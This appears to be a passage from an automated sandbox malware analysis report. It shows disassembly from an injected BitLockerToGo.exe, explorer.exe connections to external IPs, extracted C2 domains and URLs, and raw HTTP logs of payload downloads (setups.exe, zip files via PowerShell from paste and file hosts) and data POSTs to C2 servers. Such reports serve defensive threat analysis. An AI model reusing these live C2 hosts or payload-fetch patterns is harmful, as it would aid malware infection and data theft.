Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	14_2_004D7DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+10h]	14_2_004D3DE6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	14_2_004D2E51
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	14_2_004F7E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000820h]	14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+1Ch]	14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+50h]	14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	14_2_004FB840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	14_2_004FB840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ecx], ax	14_2_004D5871
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	14_2_004CA000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h	14_2_004DD810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, eax	14_2_004C38D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+10h]	14_2_004D30F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	14_2_004D30F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000820h]	14_2_004E788A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 00D23749h	14_2_004DE086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	14_2_004DE086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	14_2_004F8880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000820h]	14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+1Ch]	14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+50h]	14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, word ptr [ebx+eax*4]	14_2_004C8960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	14_2_004C8960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	14_2_004FB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	14_2_004FB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	14_2_004FB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	14_2_004DB920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	14_2_004DB920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	14_2_004D1937
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+50h]	14_2_004E91C8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [00504970h]	14_2_004E41A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then lea ebp, dword ptr [esp+03h]	14_2_004E6210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edx], 0000h	14_2_004D3A2A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h	14_2_004D82CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	14_2_004C3A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	14_2_004FB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	14_2_004FB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	14_2_004FB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	14_2_004DB360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esi+08h]	14_2_004D43E5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h	14_2_004E4BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [00504A9Ch]	14_2_004E4BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	14_2_004F1BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h	14_2_004E33B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	14_2_004CE450
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	14_2_004DEC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	14_2_004D1D52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	14_2_004C2DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	14_2_004E65F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	14_2_004FB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	14_2_004FB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	14_2_004FB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	14_2_004D4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	14_2_004D4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	14_2_004D4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	14_2_004D3678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	14_2_004D6EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then inc ebx	14_2_004D66B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov al, 01h	14_2_004FA706
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	14_2_004FB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	14_2_004FB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	14_2_004FB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	14_2_004F6710
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h	14_2_004E37B6

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 77.221.157.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.139 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.137 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.235.84 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 109.172.114.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.113.113 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 125.7.253.10 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 177.222.41.236 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 186.145.236.93 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 167.235.128.153 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.149.100.242 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: http://mzxn.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://100xmargin.com/tmp/index.php
Source: Malware configuration extractor	URLs: http://wgdnb4rc.xyz/tmp/index.php
Source: Malware configuration extractor	URLs: http://olinsw.ws/tmp/index.php

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: rentry.co

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 05:30:08 GMTServer: ApacheLast-Modified: Mon, 22 Jul 2024 19:29:34 GMTETag: "f1600-61ddb109e6b16"Accept-Ranges: bytesContent-Length: 988672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 c0 08 00 00 10 00 00 00 c0 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 50 06 00 00 d0 08 00 00 4c 06 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 30 00 00 00 20 0f 00 00 02 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 00 10 00 00 00 50 0f 00 00 02 00 00 00 12 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 00 00 00 00 60 0f 00 00 02 00 00 00 14 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 77.221.157.163 77.221.157.163
Source: Joe Sandbox View	IP Address: 107.173.160.139 107.173.160.139
Source: Joe Sandbox View	IP Address: 107.173.160.137 107.173.160.137

Source: Joe Sandbox View	ASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: Joe Sandbox View	JA3 fingerprint: a6c95ef2da5b759f65c60665167952ee
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 9363
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 155843
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1143
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1263
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20562Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1257Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569437Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
